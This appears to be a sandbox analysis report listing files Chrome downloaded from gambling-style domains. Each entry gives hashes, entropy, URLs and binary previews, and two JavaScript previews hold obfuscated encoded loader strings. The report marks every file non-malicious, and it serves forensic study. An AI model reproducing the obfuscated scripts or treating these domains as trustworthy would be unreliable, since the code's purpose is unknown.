                                                                                                                                                          Preview:GIF89aN.Q....U........nQ&...N......$....Q. ....I..[bKA..1....,j....w.....N....g..f..r....yK2.......+....G. +W..........,qi..d.....Q.k.VC.4(..../..vb-..............%7...HN-v.....x.....*..M1$...|c..b&..c...E2...g(.y...{qJ..P.qh.....3.....k3sZ............nZ8...D...............y.Y....g..)..{.v..{>....B...]..7.&9ZF.jS. ...|.......G".....'..w....x..=..q...m..q......dE.....^....s9qxoI..x...X]....G..J`J...T..i..Qk..t..^....d.f#..] ....A.....T..v...HPL..k...9- .....*..Z..dQ.~r(...r[.....p.%.!O:.%.........qj...$......Y.}.......G:......Q1...;.{%9hyE\c~_...I...A..D................f.......e..D..n.......Q...U......k.mP...%..7.BU....U..-....D.....S..a-.....M'......^477..%.@tN.x[+o_X............q.QM. a.8.......i?.p/w`G. ...u......d...........8.....!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 176 x 183, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):68837
                                                                                                                                                          Entropy (8bit):7.992710479362104
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:1536:ByHy3I3ss9/Bddf8WOrs/ATZyhw2MZSvUguVzGOL4TqPimfvKi:wjcm/BdZ8+rw2MZSvUgaGOLRpXKi
                                                                                                                                                          MD5:17F2C02267AF3C4F71354A0EF7E81B2B
                                                                                                                                                          SHA1:C103DAD9FB317968FD03F9CD1B70B2674FED6AA3
                                                                                                                                                          SHA-256:C0E00678D0CB10604E89A7B7547484808D2EA251F5376A0A81780F5A046ED597
                                                                                                                                                          SHA-512:B4EAE1889100ADCAC39809D7FFEFFCA8897E95502E00905675E1C61B7673EEF45692B021E3FC0692BC821659A20DF5A5E6513CE840D5EF975902B86284237025
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...g.-Iv..~{GD.c.7..2.|uU{..0$A@..-....Y.3.."5..@..G.g.K...D..6E. .h......]..}..{..{|.0{~.{_.....=G.V.sN..<y#....DD.?b...{..8...................t..o...-.<=a.s F..X...wD....[..._}.._..z...ny%|.........{...;.]..k..A..?F;..w..w........z.;........../P.{].;............F.....;$X...l.)..>.[%`.w.B..w.wKm...!_..k..a.;...sp..]..........%p...5...........*A.-...O....hz...d.Z?8'...n.......;.{C...L..;x...o....D.....>...K.......].om..O../.[...niq...x.{7..."...s..c..X.........\a...^...;...%....G......Ia..0.5..e)...W.0.0..Y-....w.........S.... ..EWG....e5mC.....I...f4.&./...;....H..n=......{.....^..W.....'..x../....}N..#.<B...........[...T....@.>....!..?K.<OX....... ... .I..`......d5Pk...../7....2a.@..a.J?.oE..'....q..g...f.....X.1d2..|h1......u6....1..E!w.>'...3.i.Qz..2....).Z..P+a..a).<..........|..~...."..._.}.{{...9.....p...m.u.m.`..^..*...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, baseline, precision 8, 659x544, components 3
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):75656
                                                                                                                                                          Entropy (8bit):7.973251684846932
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:aFt/QuDmbbvL7nMJ2DFOH9+8MFYPy2cKLnruYN1hM173nJ/s+YXxnFSj/dzvQ:uQs2DswFI9hfcIiYK5nObXLSLFvQ
                                                                                                                                                          MD5:B8D7A960A4B6C034F047FF01DD4D9C43
                                                                                                                                                          SHA1:59196BB3341EA91A5A55270224A76FDC20E0EA54
                                                                                                                                                          SHA-256:9F8AFC863F5B3C95ACB8B8006DBF54857C58C904170D2F89B372F0F29887923F
                                                                                                                                                          SHA-512:6613A02E861D4EAE2B2FFDAA58E8AE493855A831CA43D33C57AA54178509A0E0E02B5B0F1032F10EB912BE450447D3295209DD805C69FB740E613EB759FD923B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/video/guide.jpg
                                                                                                                                                          Preview:.............................................................................................................................................S....Adobe.d........... ..............................................................................................!1.A.."Qa.q.2...#B..R..b...$3r...C...%cs.45T..........................!1..AQa.."q2.B..#R..34.............?..l.3.+M..~.oe.I.YO..I.......*."*<v.HvI..'...L..\....On.Hd...d..Oo.`l9(.>....,.....2%.%...$E.tV.....l.m....Z.Y#l...Sh.~PF..5v{I...4&k,..Sp..6.;W.dv.,.....q...A.F..l.6. k.......L.u..@.e.....0....C....b4t.l..;f..6........&.#....aK.4..#..W..q..X|.b.G!..wjp.'*.3d..nT^{...../&..FoJ...#s..(..Q......).bn.2TsbM..6......UI.....Tk..C..l.).......+TJ.*.4..:..%.6Q......U.lGlNx...0...j$...(M.4./#N.tBL6.s...~.....E.d.r...lY[..#..o...5....;.tr....^AW.r.%..S|..C.....dpqy..7lT....7.......S..Z=...v..............U..g%.J'..9..l..g.{E,TT.... .G....d}.....V.....\....X$|.....~.........I6.7...7.,mFR<'...>m./..{...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24
                                                                                                                                                          Entropy (8bit):4.1887218755408675
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:uuKln:uu4n
                                                                                                                                                          MD5:356555E64410CB07748C013C7862421C
                                                                                                                                                          SHA1:9FC2E0D7B2297CAB2DD4824D42BB20AF8CE1B6FE
                                                                                                                                                          SHA-256:9BF353A4E2B515DA809F62D31F61F5FD659AB8FFA04E1AC7A3304F2B05510748
                                                                                                                                                          SHA-512:0A14AE03555EBA744339B7632B8F5D382F60232499BC4D773D88DBDB7E3FAEAB7CC2815477EF59A68D500E648F977ECB68EA03D9DC9CB88FAD7201F2876D9A7C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:....(empty-777).
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 14 x 17, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1102
                                                                                                                                                          Entropy (8bit):6.354586907240545
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:U1hiyWwjx82lY2T37VX6oyJ3VoqG/+nKjc:auNn2vUrJ37RnKA
                                                                                                                                                          MD5:9D9825E157031DDB20C926E39A1B2717
                                                                                                                                                          SHA1:42FC9960E82C04A9D615F77A6D535E828B2B3F51
                                                                                                                                                          SHA-256:75A39B4FD5657500786DEC2A38C2F0F909DDB975A3DF963877F154535D6C55F4
                                                                                                                                                          SHA-512:330E6DD75E16E321145AB16C5AEF10CB5F355A5FBCD8927982CEE29B8CDBEF94B1EBFE13AFE82B4DAD5771AA980FB073E0B9CF3440DECD5D2C79FD2AB4D37C6D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/top/icon_user.png
                                                                                                                                                          Preview:.PNG........IHDR....................tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:8623A41CF39411E7A46FAA286A920394" xmpMM:DocumentID="xmp.did:8623A41DF39411E7A46FAA286A920394"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8623A41AF39411E7A46FAA286A920394" stRef:documentID="xmp.did:8623A41BF39411E7A46FAA286A920394"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.'......IDATx.b...?.....@...Alytu.....L..*.W.....X.........5.2..f.4~...>.'.h<.....?...HL._..p=.......g i..M....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 52 x 52, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2405
                                                                                                                                                          Entropy (8bit):7.554105368528751
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:LuNn2vJcJ3BAT4M1sL/ZMXCmMHQ0xiStQzQPWHdWx0IebH1:W2xsRMGLWXzP08owQqdOebH1
                                                                                                                                                          MD5:D4FC8E799A6E0322C6A5A99EEC80BE27
                                                                                                                                                          SHA1:47C64C12AEFA559DDB692C82B04F89BEA5152848
                                                                                                                                                          SHA-256:D3A985D1971212DF9C1C8DA705AA1D2DE51CC288F022F2726DCDB4DB1EC04F0E
                                                                                                                                                          SHA-512:38BF32C52D386602695A03FC10C8E6683625AEAAA9D37CEC69C7C23F53013BC34840A849BDCDC13959A42C11798A9F240DB9188E6494F75B059827619EB99F63
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/382/service/icon04.png
                                                                                                                                                          Preview:.PNG........IHDR...4...4......x......tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c067 79.157747, 2015/03/30-23:40:42 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2015 (Windows)" xmpMM:InstanceID="xmp.iid:942B41E6F77711E7A0ACF7175D98DB17" xmpMM:DocumentID="xmp.did:942B41E7F77711E7A0ACF7175D98DB17"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:942B41E4F77711E7A0ACF7175D98DB17" stRef:documentID="xmp.did:942B41E5F77711E7A0ACF7175D98DB17"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...I....IDATx..Zkl.E..n...F.j.U.y*....y..hZ#.G(..c$61......."IU,QH....E)F.b.%.._ ....+...|..d.w..]...t...{g
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (980), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):980
                                                                                                                                                          Entropy (8bit):5.745839646641137
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:VKScZwL0DDn0tI5HVZ7OitgDkXQnKxq3QpK4sn:VK3ZkwD02DZsDYQnKxoQs4s
                                                                                                                                                          MD5:C5EA2C39CF8D8F2BCF002A7B3D42210C
                                                                                                                                                          SHA1:6295B3EE072AFA2D21495AC109CF6CA725898D75
                                                                                                                                                          SHA-256:19BD170EAFDA0AB580FBBE13D020D9D537A5BE8EB5D1D51FC3112FD6D4D9A82D
                                                                                                                                                          SHA-512:903D690FC3E119D983DD0715CB78761E75495ACAE6D822F6172CF9F09B3DD438049939F2A0230DB12A2F2E5D80F13986BF570EF275E5AF6B9920321BA673B46B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/toast.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAHAZgHYBdAGgG8AiQgJULUoC4AzAVzRgBcBLdTT0iACU5AL6kAggFUADABEW7LrzT9BpJCMqskIAARJOAJ25dKAbgDyYAFYguAOgAmIZtzQgACkZQQQRzgBPTBBSSgB9cJAkAFkUJ1YAGxBKCgA3KETWEEYAQhlRIXMMoz0oAF4kTEo5J1xgSiFSFEqHVSgmtErqgDkATQAPS0bSbm6a1gB6ACYRo3LMFEwhTDFSazsuTDQHAFsoCABxEE5Of00cSk4UKENKYiEmpZW1jftObb2DmNZOKB50BdyLpOAAVG6GRjcBzhQiFJrkGAoXYQX4gJyMZ6rcRvLY7fZHE5nIwXbBXCGce6PUhOf5QRQcAGqERGE6sIxoMTiXYnAAW8SQmOW2PWtnenwJPz+TKBIPBt04UJhcOpMFZ/3RDOUfBEokKpBg5XIrLQLiMWqZy3IJT0nHKnF53CQDgAJGqQBqAKLJHloAQge2O53hXSJZgwmAAH0jnHMrM47LQehA1WMUDQSG4TNS5H+xkF5DQUB5jEoSES3BcAFpmFAXJQ9aRsCnKE5uGkc23Wco0tFGNhC8WcmX+Q1SEYoMAekPS2kq0hR6kMlkcg6nQ5rgqHE6AMqjwQDCCspCZ9ClzeGbdIPcoBqiMiGf6mADCiVugvJCqr+3cqUMgWSRhyDAWA4AAcx8dgnGfFBEhQc012dC9OAcMAwJguCjEbZtqjbDsKEfHgYFfd9zxAAZKQ0IJAMRWD4MYRCNwpBxmHQTgMPg8QnGRbxfALdwPCMAAJUEYgAGQYoMYSqRjkI3cjOCEPUhAeB5xEI0waBAU1/AAMQzftiFEYooFKJxxgANSkSZcEaTAjANUhcgARlINhGRUfgRCqag6AYJSwlpP4qznQgZGYEB8DAABWJxUjQJJEiKEBnFcKAkjtJwHHIiB4M4JBlPMIA==")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 139 x 139, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):40589
                                                                                                                                                          Entropy (8bit):7.985652243898314
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:pCc5c+ZHTkEy45xQD4CeaI/LteVGSFd40j3NDi69rpPY+jnPM19kxlo8:pCcrkQuD4CeaIpOXNDi0PYWniV8
                                                                                                                                                          MD5:CD13824ADA9FC128D5C168EE98EC4343
                                                                                                                                                          SHA1:8AC2AE7A13D96199272E07C5A11DF537ED7EB88C
                                                                                                                                                          SHA-256:78F5D48D24758DAABAF709BBA9E51D442C54C418C32091ECAC7C4D4AE92C077F
                                                                                                                                                          SHA-512:954F230E7B804493A3FC172B0066845E1F8022F6B6C275553313D60BCE11160EA554EAA1493A735A5F1C53E490A58D1C0413C2EFC783D181226C08A0FFD1D17A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/casino/04.png
                                                                                                                                                          Preview:.PNG........IHDR.............Q.j.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......IDATx...u.].y.....aiFlK.l.2.1.l'N...fp.J.i{..bn1.5I..C.c....-.,.H....Mk.....Hv.j........x..........<...C"...[.?.................H.j.E{O..S..;.s..._w.............\...I.....F...7}..G!.?=..k..',.*..../..O.*A..x......._3....%....fr..D...;..vh.M$........^X...!.f.....$_.&.....B.. ...?....'~...........p....."...[!ev.D.k.wM....O.K&$.O....o|w.g!M. I......x...+...k..bA.>........A..{.m._d.3v.;.JZ.a.W...dCd.b.D"1..9...Z...w~...qbA>....X.u.Gd.+...CX...9,V.t..>j.n..."...}.m"l.$.a...^O...{...........{.../..e.y......Ld2.w...O.g.a.....x...y......@......B`....G. .X.d......W......Ax...`....;.bR.1....|Ibc...V.&8 ..'..Y......5...`1...o..*.....os..Q..N.%..../......1p..9..].A... .a......n..^`....<.~..........A.M!U .......j.y..,..K4zD`.\...T......{..E....s^.....~k.....q.+....T ......j...........4fA[<.>.5gq... <.......V>8%W>|.[..D.J,.#..iB..7..e~#..H.>..M
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 334 x 81, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):13711
                                                                                                                                                          Entropy (8bit):7.965899029937212
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:hSHIIHUCD4wagyEhj4VNNDE0U4ATuixbNVnyTo4jfm3/6LVTE12Qw992ifau86WD:I50wLymMlP7qpQw/2Tsa2DpLWAws1NTD
                                                                                                                                                          MD5:A14B1EED93690BBECBB6B049B53DD7A6
                                                                                                                                                          SHA1:212AAA678DF915109BAA9E322F9E930448408AD6
                                                                                                                                                          SHA-256:33142589E5F294F4E4166E269F0EFD6ABA18CD7034E95F64E1AEA47A187A9319
                                                                                                                                                          SHA-512:3EB48B612353F353A38948C569B8233D65BA1F2EA263D2F931F18AE4D34BEC25EC7C2A1F3E38B95DF64B112B1CEB35A8679CC78EB97F54FD1F48F5BF1A6919AA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://www.image110.com/uploads/7e9da78cd07675b6d3cb43e4d5dddfed.png
                                                                                                                                                          Preview:.PNG........IHDR...N...Q.....2.......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 231x135, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13380
                                                                                                                                                          Entropy (8bit):7.947193700012093
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:OMiNuMZ9aSfgV7ED4zQMjlg3k0ZNNf1iEtlUwizoJDj0wUSgBjDF1/W8Z7Wspv4S:OcO9aSo7E05z0ZNNfQE1BtsjGvspAS
                                                                                                                                                          MD5:5357E4239740BA9EC45D841B12D855FE
                                                                                                                                                          SHA1:7AD3F29D694D88A132DD04A972525E751D286279
                                                                                                                                                          SHA-256:62CDE00BFB7F2FC78CDDCEF1F756F1BF6B41938135FFFC2A983C4EF195A5290A
                                                                                                                                                          SHA-512:21963FFDC270538053958756B2CB00F56B325DF2AE36C23B913CCF4F1E81F8CF9A71E0EE102640DB0227611BE98F48645891B3F6222B28BCB7B9D040718B097B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:......Exif..II*.................Ducky.......P......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:29498082-5ddd-3c4d-86ad-a7cbd10a716b" xmpMM:DocumentID="xmp.did:BC4F1C158D5811E78563D2E50C3F5203" xmpMM:InstanceID="xmp.iid:BC4F1C148D5811E78563D2E50C3F5203" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:82b9be3e-f922-d048-8196-e2c819558962" stRef:documentID="adobe:docid:photoshop:eddc2de5-6163-11e7-92d7-efec1b3bcc87"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d...............................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1x1, components 1
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):332
                                                                                                                                                          Entropy (8bit):6.8679847753890115
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:dfNIOW/mfM8plt//kC7kmdViN0XxgRPWTTbOsvWGKkCHdcfmcGn1NMf/qLnDzofo:FC9YM8p//slJ0Xx0WzOsvWGKkCHdcfmx
                                                                                                                                                          MD5:BD9D76386CEE85AC4BE2F43FB3156A02
                                                                                                                                                          SHA1:D1BFC8928661CA2B2F71562EDC745419C582A88E
                                                                                                                                                          SHA-256:A26A53CFBFBF7CAE14898AC89EE39558CD9ED81D4E1D86FF2E5D17B6C185DC1F
                                                                                                                                                          SHA-512:7CDBE4BDD27C94FB93BE7DFFD3AB47BFA785FF578FB6EBFB5DEDA7527CA1122A76AAB1BBC900C02AA2E95686DC0B52CE95C9589721E89B771FBC7079C5057AD8
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://ocsapi1961.hydqef.com/ocs/cc.png?1717972879159
                                                                                                                                                          Preview:......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342..................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz.................................................................................?.....
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 635
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):431
                                                                                                                                                          Entropy (8bit):7.4934780132929495
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:XXWJdFuB29sE7jgQaTQIHqlBerth2wEK6wuO2Iu/:XXWJdFsDEQlrHWB2QrUbo
                                                                                                                                                          MD5:EE1F28F59BC095C075D29DCF5A3EE1E9
                                                                                                                                                          SHA1:073584A9DAB2F999BB3BC2B45837232A7182DED5
                                                                                                                                                          SHA-256:B916E0A30F5B07409434924174F16716C008C91182E82CED7438EFE2C9E5C5BA
                                                                                                                                                          SHA-512:47EBF70058592267F62627EC1A09B133C854DDDFCC2B41D7CF2C5506D1AA769656BBCD47FA78D19E744EBC997A7C08E9230EAF1F8654C8EC42965F8C60924D3C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/zb-cloud/stat.do?pv=ajax&pa=host.info&domain=yh8613.cc&terminal=1&r=1017729143
                                                                                                                                                          Preview:..........T..n.0...<..U...F.n...H..R.U......7.&f.AQ.6.m:.fF?....:.M..N....B....I.pr.,*...2(..6q..5.W6..B......*..6.bTU;...yj...L.g./...zgtSA.Pc..p6H..ha...w.p.F..M.>........N.U.../b[......O..)P....n.5NH.p.l..Y8..7...J.f..U...~[..9.G/zE...7.H......2.F/...*.<g1.[-y...n.o.........I.d.W..0lW.\.$7.L...f..%v..k>...).vX..8.n..Z!...U...j..u.".]E....P......>?+WUl...O.!.&.V..y.<'9...L.-N.#.....5.. ../...........bZ{...
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (820), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):820
                                                                                                                                                          Entropy (8bit):5.6878391274082585
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:V27L11jESuBGS6KEUcQ4OxJRscJIxwcgHkS:V41l4lqz+JRpJIrS
                                                                                                                                                          MD5:F4729B0C3BD3888A4B8A60BE4A5149C1
                                                                                                                                                          SHA1:A878BC2776BE2C5D9EDB2F9FDE658B7F44569223
                                                                                                                                                          SHA-256:3D7CDD4BB7437122F29B41C22FECC76F62D5BBB46D59B710224B8DEC06E83289
                                                                                                                                                          SHA-512:AB3A4CDD27C7A7BD3ACA77228188AE1AFAFD0BE17D91E6E66256E37C4D4C1D35385F09841965638A4CDE4228DCEE6AA05BA3633BDDC5D1C152E90DAFE2360B5B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/240516-03/static/js/components/121/footerCopyRight.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjCAZgF0AaAbwCIB6MKgEQoC4AzAVzRgBcBLdTTkmgCUZAL4kA0gDYA5gC8W7LrzT9BJECIqskIAARJOAJ25cKAbgDyYAFYguAOgAmIZtzQgACkZQQQRzgBPTDQSCgB9cJAkAFkUJ1YAGxAKcgA3KETWEEYAQgAGUSFzDKM9FABeEEwKfJgIZgohEhgKsicoTihFDh4+ESMQTlYjNDIYX0CAJW4ZAAtORgpUmCc0T065xhRnVygkzgcAYXRDKDRD1bQACRRDUXEAWyG5+KRGMRbBzpAnHuV+mRSnpOBVOHNuEhBBVgO4nChgA4AMoSACSADlzNUKLgAII2GRNGoOKgUADUaDJ1DhIAAHg4bEgmg5wSBVGxeioQiJLpMZvNQWgHMwUChOP4HBMINNZgsSlAyiAKkKRWKJVKZQLzIcACQeWmcAAqpjgmA5ANUIh2LmY+0ShwAqjxEg4ZEMTtL+QtMCASOa+qphGRBsNRiDJXzZYKijGhE8UOxxX9/VyRA8SNw2oM0C4jP8A5gRMDQeDIdDdTBvuKAKLJZ4XDRghzhXSJZjNmAAH07aHMIZGaD02Kc3DSqTIZx4MCOiSgSHeFFV4qMAFoNSYBRRxIdwol+BHPVG/UoC0H+2HsUhoGhUtgd2l9y3uUIiHGhHGSJPTFM2bmAGJoO82BEKI8plEYVQ1AAag6VAABxEjAGYkLkuDHpyfCcCI2I0PQTTiBQHRdCuaQrlIcEAKxQGAFHMFIqRoEkiTFEKNp2qCRgOHSEAoAESAPMUQA===")
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):81660
                                                                                                                                                          Entropy (8bit):5.97851047580418
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:0tvzoO1iMbjlUirsET9uFIpBniRIJdt5Z4vqzNsOsaVjq3Ut7orSXFjsmkG:ovUYie3/ZhiidJ4TLqjFdorSXF4mkG
                                                                                                                                                          MD5:9F7C062F65E41E56A53CD8DD604702C0
                                                                                                                                                          SHA1:BFAD718567ED354C37088875B0E9791AA65AF960
                                                                                                                                                          SHA-256:4B730F6D5EC41ACCFFE1D5AF2D6DB2B087755853A88435C83D7DC22C31410360
                                                                                                                                                          SHA-512:5F126EE74DF6D27D250AC6AF8CFD3203D5D6955EB387106A7BE15B36A7BBCEF89397A1F855824DB56C98FF505FB9CA5629E485D91374DB5D38A7396D3E9DAA48
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/t4044.js
